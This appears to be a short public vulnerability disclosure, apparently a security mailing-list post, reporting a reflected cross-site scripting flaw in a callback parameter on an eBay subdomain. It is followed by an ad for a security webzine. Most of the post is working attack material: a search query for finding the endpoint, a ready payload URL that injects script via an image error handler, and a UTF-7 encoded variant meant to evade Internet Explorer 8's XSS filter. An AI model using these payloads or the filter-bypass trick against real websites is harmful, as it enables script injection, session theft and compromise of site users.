sea.ebay.com suffers from a cross site scripting vulnerability.
8c25ef99cab97f199e2833444847b4df2be05dfb7bbe6a5ea3c29bd1e05e4290
"site:ebay.com inurl:callback" on google.com
and get this url:
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?
then
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E
ofcourse u can use 《xss attacks through utf7-BOM string
injection<http://seclists.org/fulldisclosure/2011/Feb/199>》
to bypass ie8 xss filters
http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=%2B%2Fv811..%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-xcsxxadas
--superhei from http://www.80vul.com
--ad--
About Ph4nt0m Webzine
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions
.mailto:root_at_ph4nt0m.org <root_at_ph4nt0m.org> pls.thank you!